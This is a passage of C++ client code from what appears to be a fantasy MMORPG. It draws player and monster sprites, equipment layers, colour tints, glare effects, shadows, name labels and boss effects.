			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 1;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 1;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*1 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 1;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 1;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 1;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (0 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*0 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 0;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 0;
		}
		break;
	default:
		if (_tmp_sAppr2 != 0)
		{	 iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			 _tmp_cFrame = (_tmp_sAppr2 & 0x00FF ) -1;
		}
	
		else iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iBodyArmorIndex = -1;
		iArmArmorIndex  = -1;
		iBootsIndex     = -1;
		iPantsIndex     = -1;
		iWeaponIndex    = -1;
		iShieldIndex    = -1;
		iMantleIndex    = -1;
		iHelmIndex      = -1;
		break;
	}
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX, sY, _tmp_cFrame);
	switch (_tmp_sOwnerType) { // hum? la lumiere en dessous ?
	case 15: // ShopKeeper
	case 19: // Gandalf
	case 20: // Howard
	case 24: // Tom
	case 25: // William
	case 26: // Kenedy
	case 51: // CP
	case 86: // HBT
	case 90: // Gail
		m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);
		break;
	}
	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}
	if (bTrans == FALSE)
	{	CheckActiveAura(sX, sY, dwTime, _tmp_sOwnerType);
		if (_cDrawingOrder[_tmp_cDir] == 1)
		{	if (iWeaponIndex != -1)
			{	if(bInv) m_pSprite[iWeaponIndex]->PutTransSprite25(sX, sY, _tmp_cFrame, dwTime);
				else
				{	if (iWeaponColor == 0)
						 m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY,  _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				}
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, _tmp_cFrame, dwTime);
				}
				break;
			}
			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);

			if (_tmp_sOwnerType == 81) // Abaddon
			{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);

			}else if (bInv == TRUE)
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
			else
			{	if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
			}

			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0)) {
				if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iUndiesIndex != -1)
			{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			}

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iPantsIndex != -1)
			{	if(bInv) m_pSprite[iPantsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iPantsColor == 0)
						 m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}	}

			if (iArmArmorIndex != -1)
			{	if(bInv) m_pSprite[iArmArmorIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmColor == 0)
						 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}	}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iBodyArmorIndex != -1)
			{	if(bInv) m_pSprite[iBodyArmorIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmorColor == 0)
						 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}	}

			if (iHelmIndex != -1)
			{	if(bInv) m_pSprite[iHelmIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iShieldIndex != -1)
			{	if(bInv) m_pSprite[iShieldIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iShieldColor == 0)
						 m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				}
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}
		}else
		{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
			case 10: // Slime
			case 35: // Energy Sphere
			
			case 81: // Abaddon
			case 91: // Gate
				break;
			default:
				if (m_cDetailLevel != 0)
				{	if (sX < 50)
						 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, _tmp_cFrame, dwTime);
					else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, _tmp_cFrame, dwTime);
				}
				break;
			}
			if (_tmp_sOwnerType == 35)
				m_pEffectSpr[0]->PutTransSprite(sX, sY, 1, dwTime);
			if (_tmp_sOwnerType == 81) // Abaddon
			{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
			}else if (bInv == TRUE)
			{	m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, _tmp_cFrame, dwTime);
			}else
			{	if ((_tmp_iStatus & 0x40) != 0)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
			}
			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iUndiesIndex != -1)
			{	if(bInv) m_pSprite[iUndiesIndex]->PutTransSprite2(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
			}

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iPantsIndex != -1)
			{	if(bInv) m_pSprite[iPantsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iPantsColor == 0)
						 m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}	}

			if (iArmArmorIndex != -1)
			{	if(bInv) m_pSprite[iArmArmorIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmColor == 0)
						 m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}	}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if(bInv) m_pSprite[iBootsIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iBootsColor == 0)
						 m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}	}

			if (iBodyArmorIndex != -1)
			{	if(bInv) m_pSprite[iBodyArmorIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iArmorColor == 0)
						 m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}	}

			if (iHelmIndex != -1)
			{	if(bInv) m_pSprite[iHelmIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iShieldIndex != -1)
			{	if(bInv) m_pSprite[iShieldIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iShieldColor == 0)
						 m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
				}
				switch (iShieldGlare) {
				case 0: break;
				case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
				case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}

			if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
			{	if(bInv) m_pSprite[iMantleIndex]->PutTransSprite25(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else
				{	if (iMantleColor == 0)
						 m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}	}

			if (iWeaponIndex != -1)
			{	if(bInv) m_pSprite[iWeaponIndex]->PutTransSprite25(sX, sY, _tmp_cFrame, dwTime);
				else
				{	if (iWeaponColor == 0)
						 m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, _tmp_cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY, _tmp_cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
				}
				DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
				switch (iWeaponGlare) {
				case 0: break;
				case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
				case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
				case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  _tmp_cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
		}	}	}
		if (_tmp_sOwnerType == 64) // crop
		{	switch( _tmp_cFrame ) {
			case 0: // color effect for crop
				m_pEffectSpr[84]->PutTransSprite(sX+52, sY+54, (dwTime%3000)/120, dwTime );
				break;
			case 1: // color effect for crop
				m_pEffectSpr[83]->PutTransSprite(sX+53, sY+59, (dwTime%3000)/120, dwTime );
				break;
			case 2: // color effect for crop
				m_pEffectSpr[82]->PutTransSprite(sX+53, sY+65, (dwTime%3000)/120, dwTime );
				break;
		}	}
		// Berserk
		if ((_tmp_iStatus & 0x20) != 0)
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSpriteRGB(sX, sY, _tmp_cFrame, 0, -5, -5, dwTime);
		DrawAngel(40+(_tmp_cDir - 1), sX+20, sY-20, _tmp_cFrame%4, dwTime);
		DrawWanted(sX, sY, dwTime);
		CheckActiveAura2(sX, sY, dwTime,  _tmp_sOwnerType);

		//50Cent - Capture The Flag
		DrawFlagCarrier(sX, sY, _tmp_cFrame, dwTime);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX, sY, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX, sY, _tmp_sOwnerType, _tmp_iStatus);
    }    }

	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID)) {
			m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	// Snoopy: Abaddon effects
	if (_tmp_sOwnerType == 81)
	{	int randFrame = _tmp_cFrame % 12;
		m_pEffectSpr[154]->PutTransSprite70(sX-50	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[155]->PutTransSprite70(sX-20	, sY-80		, randFrame, dwTime);
		m_pEffectSpr[156]->PutTransSprite70(sX+70	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[157]->PutTransSprite70(sX-30	, sY		, randFrame, dwTime);
		m_pEffectSpr[158]->PutTransSprite70(sX-60	, sY+90		, randFrame, dwTime);
		m_pEffectSpr[159]->PutTransSprite70(sX+65	, sY+85		, randFrame, dwTime);
		switch (_tmp_cDir) {
		case 1:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+108 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-50	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 2:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-70	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 3:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+105 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-90	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 4:
			m_pEffectSpr[153]->PutTransSprite70(sX-35	, sY+100 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-80	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 5:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-65	, sY-5	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 6:
			m_pEffectSpr[153]->PutTransSprite70(sX+45	, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-31	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 7:
			m_pEffectSpr[153]->PutTransSprite70(sX+40	, sY+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-30	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 8:
